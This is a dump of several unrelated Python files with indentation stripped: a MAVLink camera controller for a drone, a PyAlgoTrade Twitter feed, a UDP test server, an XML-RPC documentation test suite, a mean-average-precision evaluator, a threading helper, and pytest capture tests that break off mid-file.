if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamExPro)) == 0):
if (mavlinkReqGetParamExPro( mySonyCam, mav2SonyVals, expro ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamExPro
def run_process_messages_from_connection(fra, the_connect, sharedObj, redCam=0):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
fra.process_messages_from_connection( fra, the_connect, sharedObj, redCam )
print ('Exiting :', multiprocessing.current_process().name)
# ================ error handler if the camera fails (powers link on off) ============
# uses https://github.com/mvp/uhubctl
#
def reset_usb_camlink():
p = os.popen('sudo /home/pi/cams/SonyTEST32/uhubctl/uhubctl -l 1-1 -a 0')
time.sleep(2)
p = os.popen('sudo /home/pi/cams/SonyTEST32/uhubctl/uhubctl -l 1-1 -a 1')
#
# ================ signal handlers ==============================
#
#
# from a signal.alarm
#
def raised_signal_handler(a,b):
print("\033[32m ============ Take Picture ==================")
# do the action here
#
# CTL-C
#
def ctlc_handler(signum, frame):
print("Signal Number:", signum, " Frame: ", frame)
#
# CTL-Z
#
def exit_handler(signum, frame):
print('Exiting....')
exit(0)
#
# on getting kill -SIGUSR1
#
def sigusr1_handler(signum, frame):
print("signal hander with a kill -SIGUSR1 (signal.SIGUSR1)")
# what we want to do on that external signal
if __name__ == '__main__':
# Register the alarm signal with our handler signal. signal(signal. SIGALRM, alarm_handler)
signal.signal(signal.SIGALRM, raised_signal_handler)
# to raise this insert this anywhere in code
# signal.alarm(1)
# Register our signal handler with `SIGINT`(CTRL + C)
signal.signal(signal.SIGINT, ctlc_handler)
# Register the exit handler with `SIGTSTP` (Ctrl + Z)
signal.signal(signal.SIGTSTP, exit_handler)
# external signal handler
signal.signal(signal.SIGUSR1, sigusr1_handler)
frame = MAVFrame()
state = False
while (state == False):
try:
cID,state = frame.makeMAVlinkConn()
except Exception as e:
print("Error Trap :: ", e.__class__, " occurred.")
# wait heartbeat
# if it sends another sys id we need to change it
#
state = False
xx = 1
while xx == 1:
m = cID.recv_match(type="HEARTBEAT", blocking=True, timeout=5)
if not (m == None):
if not ( m.autopilot == mavutil.mavlink.MAV_AUTOPILOT_INVALID ):
xx = 2
id = m.get_srcSystem()
if not ( m.get_srcSystem() == frame.DEFAULT_SYS_ID ) :
print("-------- new id found --------")
while (state == False):
try:
cID,state = frame.makeNewMAVlinkConn(id)
except Exception as e:
print("Error Trap :: ", e.__class__, " occurred.")
# default logger
#
multiprocessing.log_to_stderr(logging.DEBUG)
#
# for extra logging use this
# instead
#
# multiprocessing.log_to_stderr()
# logger = multiprocessing.get_logger()
# logger.setLevel(logging.INFO)
#
# create instance of sony alpha cam (new API)
#
mySonyCamNo1 = sonyAlphaNewCamera()
#
# create an instance of common write structure
# from mavlink reader task to the camera
#
gcsWrites2Sony = mavlinkSonyCamWriteVals()
#
# init the objects with camera data
# & set rhw data to be written back to gcs via mavlink
#
#
# Initialise all shared object data between
# camera and mavlink processes
#
expro = mySonyCamNo1.initSonyCamExProData( )
aper = mySonyCamNo1.initSonyApertureData( )
focusdata = mySonyCamNo1.initSonyCamFocusData( )
focusarea = mySonyCamNo1.initSonyCamFocusAreaData( )
iso = mySonyCamNo1.initSonyCamISOData( )
shut_sp = mySonyCamNo1.initSonyCamShutSpdData( )
whitebal = mySonyCamNo1.initSonyCamWhiteBalaData( )
stillcap = mySonyCamNo1.initSonyCamStillCapModeData( )
#
# now set the class to be initialised
#
gcsWrites2Sony.init_class_state()
while True:
run_process_messages_from_connection(frame, cID, gcsWrites2Sony)
#manageAlphaCameraIso(mySonyCamNo1, gcsWrites2Sony, iso)
#exit(10)
#
# run the process managing the cmaera
#
#
# run the process managing the cmaera
#
a = True
while a:
p0 = multiprocessing.Process(name='run_process_mavlink', target=run_process_messages_from_connection, args=(frame, cID, gcsWrites2Sony,))
p0.daemon = True
if not p0.is_alive() == True:
p0.start()
p00 = multiprocessing.Process(name='serviceParamRequests', target=serviceParamRequests, args=(mySonyCamNo1, gcsWrites2Sony, stillcap, whitebal, shut_sp, iso, focusdata, focusarea, expro))
p00.daemon = True
if not p00.is_alive() == True:
p00.start()
p1 = multiprocessing.Process(name='manageAlphaCameraExpro', target=manageAlphaCameraExpro, args=(mySonyCamNo1, gcsWrites2Sony, expro,)).start()
#time.sleep(0.1)
p3 = multiprocessing.Process(name='manageAlphaCameraAperture', target=manageAlphaCameraAperture, args=(mySonyCamNo1, gcsWrites2Sony, aper,)).start()
#time.sleep(0.1)
p5 = multiprocessing.Process(name='manageAlphaCameraFocusData', target=manageAlphaCameraFocusData, args=(mySonyCamNo1, gcsWrites2Sony, focusdata, focusarea,)).start()
#time.sleep(0.1)
p7 = multiprocessing.Process(name='manageAlphaCameraIso', target=manageAlphaCameraIso, args=(mySonyCamNo1, gcsWrites2Sony, iso,)).start()
#time.sleep(0.1)
p9 = multiprocessing.Process(name='manageAlphaCameraShutSpd', target=manageAlphaCameraShutSpd, args=(mySonyCamNo1, gcsWrites2Sony, shut_sp,)).start()
#time.sleep(0.1)
p11 = multiprocessing.Process(name='manageAlphaWhiteBala', target=manageAlphaWhiteBala, args=(mySonyCamNo1, gcsWrites2Sony, whitebal,)).start()
#time.sleep(0.1)
p13 = multiprocessing.Process(name='manageAlphaCameraStillCap', target=manageAlphaCameraStillCap, args=(mySonyCamNo1, gcsWrites2Sony, stillcap,)).start()
#time.sleep(0.1)
if p1 is not None:
p1.join()
if p3 is not None:
p3.join()
if p5 is not None:
p5.join()
if p7 is not None:
p7.join()
if p9 is not None:
p9.join()
if p11 is not None:
p11.join()
if p13 is not None:
p13.join()
p2 = multiprocessing.Process(name='sendMavExpro', target=sendMavExpro, args=(mySonyCamNo1, expro, cID,)).start()
p4 = multiprocessing.Process(name='sendMavAper', target=sendMavAper, args=(mySonyCamNo1, aper, cID,)).start()
p6 = multiprocessing.Process(name='sendMavFocusData', target=sendMavFocusData, args=(mySonyCamNo1, focusdata, focusarea, cID, )).start()
p8 = multiprocessing.Process(name='sendMavIso', target=sendMavIso, args=(mySonyCamNo1, iso, cID, )).start()
p10 = multiprocessing.Process(name='sendMavShutSpd', target=sendMavShutSpd, args=(mySonyCamNo1, shut_sp, cID, )).start()
p12 = multiprocessing.Process(name='sendMavWhiteBala', target=sendMavWhiteBala, args=(mySonyCamNo1, whitebal, cID, )).start()
p14 = multiprocessing.Process(name='sendMavStillCap', target=sendMavStillCap, args=(mySonyCamNo1, stillcap, cID, )).start()
if p2 is not None:
p2.join()
if p4 is not None:
p4.join()
if p6 is not None:
p6.join()
if p8 is not None:
p8.join()
if p10 is not None:
p10.join()
if p12 is not None:
p12.join()
if p14 is not None:
p14.join()
#if p0 is not None:
#p0.join()
# if p0.is_alive() == True:
# p0.terminate()
#
# alternative if we want in main to program we can use daemon (procs) as shown here
# we do not wait for daemons to complete
# https://ja.pymotw.com/2/multiprocessing/basics.html
# https://techacademy.jp/magazine/20607
# we could for example put a while loop inside this function and just run continuosly in the back ground looping as a daemon proc
#
# d = multiprocessing.Process(name='manageAlphaCameraStillCap', target=manageAlphaCameraStillCap, args=(mySonyCamNo1, gcsWrites2Sony, stillcap))
# d.daemon = True
# n = multiprocessing.Process(name='manageAlphaCameraStillCap', target=sendMavStillCap, args=(mySonyCamNo1, shut_sp, ConnID ))
# n.daemon = False
# d.start()
# n.start()
# wait for a process e.g. non-daemon with a timeout of 5 seconds
# n.join(5)
#
# if its still alive and you want to kill it
#
# to check it is n.is_alive()
# if n.is_alive() == True:
# n.terminate()
# print(n.exitcode) # === the exit code from the routine
#
# Release the shared memory
#
del expro
del stillcap
del aper
del focusdata
del focusarea
del shut_sp
del whitebal
del stillcap
|
code_execution_with_time_limit.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import multiprocessing
def run():
import time
i = 1
# Бесконечный цикл
while True:
print(i)
i += 1
time.sleep(1)
if __name__ == '__main__':
p = multiprocessing.Process(target=run)
p.start()
# Wait
p.join(5)
# Если процесс живой,то убиваем его
if p.is_alive():
print("Kill it.")
# Terminate
p.terminate()
|
feed.py
|
# PyAlgoTrade
#
# Copyright 2011-2014 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import Queue
import threading
import json
from pyalgotrade import observer
import pyalgotrade.logger
import tweepy
from tweepy import streaming
logger = pyalgotrade.logger.getLogger("twitter")
# This listener just pushs data into a queue.
class Listener(streaming.StreamListener):
def __init__(self, queue):
streaming.StreamListener.__init__(self)
self.__queue = queue
def on_connect(self):
logger.info("Connected.")
def on_timeout(self):
logger.error("Timeout.")
def on_data(self, data):
self.__queue.put(data)
return True
def on_error(self, status):
logger.error(status)
return False
# https://dev.twitter.com/docs/streaming-apis/parameters
class TwitterFeed(observer.Subject):
"""Class responsible for connecting to Twitter's public stream API and dispatching events.
Check https://dev.twitter.com/docs/streaming-apis/streams/public for more information.
:param consumerKey: Consumer key.
:type consumerKey: string.
:param consumerSecret: Consumer secret.
:type consumerSecret: string.
:param accessToken: Access token.
:type accessToken: string.
:param accessTokenSecret: Access token secret.
:type accessTokenSecret: string.
:param track: A list of phrases which will be used to determine what Tweets will be delivered
on the stream. A phrase may be one or more terms separated by spaces, and a phrase will match
if all of the terms in the phrase are present in the Tweet, regardless of order and ignoring case.
:type track: list.
:param follow: A list of user IDs, indicating the users whose Tweets should be delivered on the
stream. Following protected users is not supported.
:type follow: list.
:param languages: A list of language IDs a defined in http://tools.ietf.org/html/bcp47.
:type languages: list.
.. note::
* Go to http://dev.twitter.com and create an app. The consumer key and secret will be generated for you after that.
* Create an access token under the "Your access token" section.
* At least **track** or **follow** have to be set.
"""
QUEUE_TIMEOUT = 0.01
MAX_EVENTS_PER_DISPATCH = 50
def __init__(self, consumerKey, consumerSecret, accessToken, accessTokenSecret, track=[], follow=[], languages=[]):
if not isinstance(track, list):
raise Exception("track must be a list")
if not isinstance(follow, list):
raise Exception("follow must be a list")
if not isinstance(languages, list):
raise Exception("languages must be a list")
self.__event = observer.Event()
self.__queue = Queue.Queue()
self.__thread = None
self.__running = False
listener = Listener(self.__queue)
auth = tweepy.OAuthHandler(consumerKey, consumerSecret)
auth.set_access_token(accessToken, accessTokenSecret)
self.__stream = tweepy.Stream(auth, listener)
self.__track = track
self.__follow = follow
self.__languages = languages
def __threadMain(self):
try:
logger.info("Initializing client.")
self.__stream.filter(track=self.__track, follow=self.__follow, languages=self.__languages)
finally:
logger.info("Client finished.")
self.__running = False
def __dispatchImpl(self):
ret = False
try:
nextTweet = json.loads(self.__queue.get(True, TwitterFeed.QUEUE_TIMEOUT))
ret = True
self.__event.emit(nextTweet)
except Queue.Empty:
pass
return ret
def subscribe(self, callback):
"""Subscribe to Twitter events. The event handler will receive a dictionary with the data as defined in:
https://dev.twitter.com/docs/streaming-apis/messages#Public_stream_messages.
"""
return self.__event.subscribe(callback)
def start(self):
if self.__thread is not None:
raise Exception("Already running")
# Start the thread that will run the client.
self.__thread = threading.Thread(target=self.__threadMain)
self.__thread.start()
self.__running = True
def stop(self):
try:
if self.__thread is not None and self.__thread.is_alive():
logger.info("Shutting down client.")
self.__stream.disconnect()
except Exception, e:
logger.error("Error disconnecting stream: %s." % (str(e)))
def join(self):
if self.__thread is not None:
self.__thread.join()
assert(not self.__running)
def eof(self):
return not self.__running
def dispatch(self):
ret = False
dispatched = TwitterFeed.MAX_EVENTS_PER_DISPATCH
while self.__dispatchImpl() and dispatched > 0:
ret = True
dispatched -= 1
return ret
def peekDateTime(self):
return None
def getDispatchPriority(self):
return None
|
test_server.py
|
import socket,time
from threading import Thread
import numpy as np
import string
import pickle
import pyautogui
'''
this class generates random numbers and broadcast them via the UDP protocal to the local network
print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT
print "message:", MESSAGE
'''
class TestServer(object):
UDP_IP = "127.0.0.1"
UDP_PORT = 5005
MESSAGE = "Hello, World!"
SLEEP_TIME = 0.01 # seond 100 Hz per second
def __init__(self):
self.sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
def __dataThreadFunction( self, socket,sleep_time ):
while True:
# Block for input
rand_num = np.random.rand()
self.sock.sendto(str(rand_num).encode(), (self.UDP_IP, self.UDP_PORT))
time.sleep(sleep_time)
def run( self ):
# Create a separate thread for receiving data packets
dataThread = Thread( target = self.__dataThreadFunction, args = (self.sock, self.SLEEP_TIME))
print('Server starts to broadcast data')
dataThread.start()
#this child class replaces the generator and then waits for the mouse command
class TestServerMouse(TestServer):
def __init__(self):
super().__init__()
def __dataThreadFunction( self, socket,sleep_time ):
while True:
#get cursor position with pyautogui
cursor_pos = pyautogui.position()
#prepare dump data
dump_data = pickle.dumps(cursor_pos)
self.sock.sendto(dump_data, (self.UDP_IP, self.UDP_PORT))
time.sleep(sleep_time)
def run(self):
dataThread = Thread( target = self.__dataThreadFunction, args = (self.sock, self.SLEEP_TIME))
print('Server starts to broadcast data')
dataThread.start()
#test function
if __name__ == "__main__":
tsm = TestServerMouse()
tsm.run()
|
test_docxmlrpc.py
|
from xmlrpc.server import DocXMLRPCServer
import http.client
from test import support
import threading
import time
import unittest
PORT = None
def server(evt, numrequests):
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
global PORT
PORT = serv.socket.getsockname()[1]
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"""This is an XML-RPC server's documentation, but the server can be used by
POSTing to /RPC2. Try self.add, too.""")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.server_close()
PORT = None
evt.set()
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
threading.Thread(target=server, args=(self.evt, 1)).start()
# wait for port to be assigned
n = 1000
while n > 0 and PORT is None:
time.sleep(0.001)
n -= 1
self.client = http.client.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
self.evt.wait()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server throws an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_(
b"""<dl><dt><a name="-<lambda>"><strong><lambda></strong></a>(x, y)</dt></dl>"""
in response.read())
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to PEPS
and RFCs with links, and that it linkifies text starting with http or
ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assert_( # This is ugly ... how can it be made better?
b"""<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd><tt>Add two instances together. This follows <a href="http://www.python.org/dev/peps/pep-0008/">PEP008</a>, but has nothing<br>\nto do with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">RFC1952</a>. Case should matter: pEp008 and rFC1952. Things<br>\nthat start with http and ftp should be auto-linked, too:<br>\n<a href="http://google.com">http://google.com</a>.</tt></dd></dl>"""
in response, response)
def test_system_methods(self):
"""Test the precense of three consecutive system.* methods.
This also tests their use of parameter type recognition and the systems
related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assert_(
b"""<dl><dt><a name="-system.methodHelp"><strong>system.methodHelp</strong></a>(method_name)</dt><dd><tt><a href="#-system.methodHelp">system.methodHelp</a>(\'add\') => "Adds two integers together"<br>\n <br>\nReturns a string containing documentation for the specified method.</tt></dd></dl>\n<dl><dt><a name="-system.methodSignature"><strong>system.methodSignature</strong></a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">system.methodSignature</a>(\'add\') => [double, int, int]<br>\n <br>\nReturns a list describing the signature of the method. In the<br>\nabove example, the add method takes two integers as arguments<br>\nand returns a double result.<br>\n <br>\nThis server does NOT support system.methodSignature.</tt></dd></dl>\n<dl><dt><a name="-test_method"><strong>test_method</strong></a>(arg)</dt><dd><tt>Test method\'s docs. This method truly does very little.</tt></dd></dl>""" in response)
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_(b"""Try self.<strong>add</strong>, too.""" in
response.read())
def test_main():
support.run_unittest(DocXMLRPCHTTPGETServer)
if __name__ == '__main__':
test_main()
|
map.py
|
import numpy as np
from multiprocessing import Process, Manager
# bbox = target['bbox']
# bbox = torch.stack([bbox[:, :, 1], bbox[:, :, 0], bbox[:, :, 3], bbox[:, :, 2]],
# dim=-1) # Change yxyx to xyxy
# cls = torch.unsqueeze(target['cls'], dim=-1)
# max_cls = torch.sum(cls > 0, dim=1).max().item()
# target_tensor = torch.cat([bbox, cls], dim=-1)[:, :max_cls, :]
# output = output['detections']
# output = output.cpu().detach().numpy()
# output[:, :, :4] = output[:, :, :4] / target['img_scale'].reshape(-1, 1, 1).cpu().numpy() # Normalized
# output[:, :, 2] = output[:, :, 2] + output[:, :, 0] # Change xywh to xyxy
# output[:, :, 3] = output[:, :, 3] + output[:, :, 1]
# target_tensor = target_tensor.cpu().detach().numpy()
#
# evaluator.add_predictions(output, target_tensor)
class MeanAveragePrecision(object):
def __init__(self, n_class, iou_array, score_th=0.1, multiprocessing=False):
self.n_class = n_class + 1
self.n_iou = len(iou_array)
self.iou_array = iou_array
self.zero = np.zeros([1, self.n_iou]).reshape(1, self.n_iou)
self.ones = np.ones([1, self.n_iou]).reshape(1, self.n_iou)
self.multiprocessing = multiprocessing
self.process = []
self.score_th = score_th
self.eps = 1e-6
if not self.multiprocessing:
self.data_per_class = [[] for i in range(self.n_class)]
self.n_samples_per_class = np.zeros(self.n_class)
else:
self.manger = Manager()
self.data_per_class = self.manger.list()
self.n_samples_per_class = self.manger.list()
[self.data_per_class.append([]) for i in range(self.n_class)]
@staticmethod
def area(box_a: np.ndarray):
return (box_a[:, :, 2] - box_a[:, :, 0]) * (box_a[:, :, 3] - box_a[:, :, 1])
def compute_iou(self,box_a: np.ndarray, box_b: np.ndarray):
"""
:param box_a: [B,P,4]
:param box_b: [B,L,5]
:return:
"""
area_a = np.expand_dims(MeanAveragePrecision.area(box_a), axis=1)
area_b = np.expand_dims(MeanAveragePrecision.area(box_b), axis=2)
box_a = np.expand_dims(box_a, axis=1)
box_b = np.expand_dims(box_b, axis=2)
xy_max = np.maximum(box_a[:, :, :, :2], box_b[:, :, :, :2])
xy_min = np.minimum(box_a[:, :, :, 2:], box_b[:, :, :, 2:])
inter_area = np.maximum(0, xy_min[:, :, :, 0] - xy_max[:, :, :, 0]) * np.maximum(0,
xy_min[:, :, :, 1] - xy_max[:,
:, :, 1])
iou = inter_area / ((area_a + area_b - inter_area) + self.eps)
return iou
def _calculate_sample_tp(self, prediction_i, label_i, iou_i):
for class_index in range(self.n_class): # Loop over classes
prediction_class_status = prediction_i[:, 5] == class_index
if np.any(prediction_class_status):
res_list = []
prediction_index = np.where(prediction_class_status)[0]
label_class_status = label_i[:, 4] == class_index
if np.any(label_class_status):
label_index = np.where(label_class_status)[0]
label_status = np.ones([label_index.shape[0], self.n_iou], dtype=np.bool)
for pi in prediction_index:
iou = iou_i[label_index, pi]
iou_index = np.argmax(iou)
max_iou = iou[iou_index]
score = prediction_i[pi, 4]
if score > self.score_th:
tp = (self.iou_array < max_iou) * label_status[iou_index, :]
label_status[iou_index, :] = label_status[iou_index, :] * np.logical_not(tp)
res_list.append(np.concatenate([tp, np.asarray(score).reshape(1)]))
else:
for pi in prediction_index:
score = prediction_i[pi, 4]
res_list.append(
np.concatenate([np.zeros([self.n_iou], dtype=np.bool), np.asarray(score).reshape(1)]))
self.data_per_class[class_index].extend(res_list)
if self.multiprocessing:
self.n_samples_per_class.append(np.bincount(label_i[:, -1].astype('int32'), minlength=self.n_class))
else:
self.n_samples_per_class += np.bincount(label_i[:, -1].astype('int32'), minlength=self.n_class)
def add_predictions(self, prediction: np.ndarray, label: np.ndarray):
"""
:param prediction: A tensor of shape [B,P,6] where 6 is box,score,class
:param label: A tensor of shape [B,L,5] where 5 is box,class
:return:
"""
iou_matrix = self.compute_iou(prediction[:, :, :4], label[:, :, :4])
for i in range(prediction.shape[0]): # Loop Over samples
prediction_i = prediction[i, :]
label_i = label[i, :]
iou_i = iou_matrix[i, :]
if self.multiprocessing:
p = Process(target=self._calculate_sample_tp, args=(prediction_i, label_i, iou_i)) # Passing the list
p.start()
else:
self._calculate_sample_tp(prediction_i, label_i, iou_i)
def evaluate(self):
per_class_list = []
per_class_scale = []
for class_index, class_data in enumerate(self.data_per_class):
if len(class_data) == 0:
ap = np.nan
else:
class_data = np.stack(class_data, axis=0)
sort_index = np.argsort(class_data[:, -1])[::-1]
tp_array = class_data[sort_index, :-1]
n_samples = self.n_samples_per_class[class_index]
per_class_scale.append(n_samples)
cum_true_positives = np.cumsum(tp_array, axis=0)
cum_false_positives = np.cumsum(1 - tp_array, axis=0)
precision = cum_true_positives.astype(float) / (
cum_true_positives + cum_false_positives+ self.eps)
recall = cum_true_positives.astype(float) / (n_samples+ self.eps)
recall = np.concatenate(
[self.zero, recall, self.ones])
precision = np.concatenate([self.zero, precision, self.zero])
# Preprocess precision to be a non-decreasing array
for i in range(precision.shape[0] - 2, -1, -1):
precision[i, :] = np.maximum(precision[i, :], precision[i + 1, :])
average_precision_list = []
for iou_index in range(self.n_iou):
indices = np.where(recall[1:, iou_index] != recall[:-1, iou_index])[0] + 1
average_precision = np.sum(
(recall[indices, iou_index] - recall[indices - 1, iou_index]) * precision[indices, iou_index])
average_precision_list.append(average_precision)
per_class_list.append(average_precision_list)
return (np.mean(per_class_list), np.mean(per_class_list, axis=0))
|
AsyncHelper.py
|
# -*- coding: utf-8 -*-
import time
from threading import Thread
def thread_call(fn):
def wrapper(*args, **kwargs):
Thread(target=fn, args=args, kwargs=kwargs).start()
return wrapper
class Test:
def __index__(self):
pass
@staticmethod
@thread_call
def aa():
print(int(time.time()))
time.sleep(2)
print(int(time.time()))
return {"k", "v"}
if __name__ == '__main__':
l = []
for url in range(10):
r = Test.aa()
print(r)
print(l)
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import cast
from typing import Generator
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import CaptureResult
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
from _pytest.pytester import Testdir
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def StdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0) if in_ else None,
out=capture.SysCapture(1) if out else None,
err=capture.SysCapture(2) if err else None,
)
def TeeStdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0, tee=True) if in_ else None,
out=capture.SysCapture(1, tee=True) if out else None,
err=capture.SysCapture(2, tee=True) if err else None,
)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
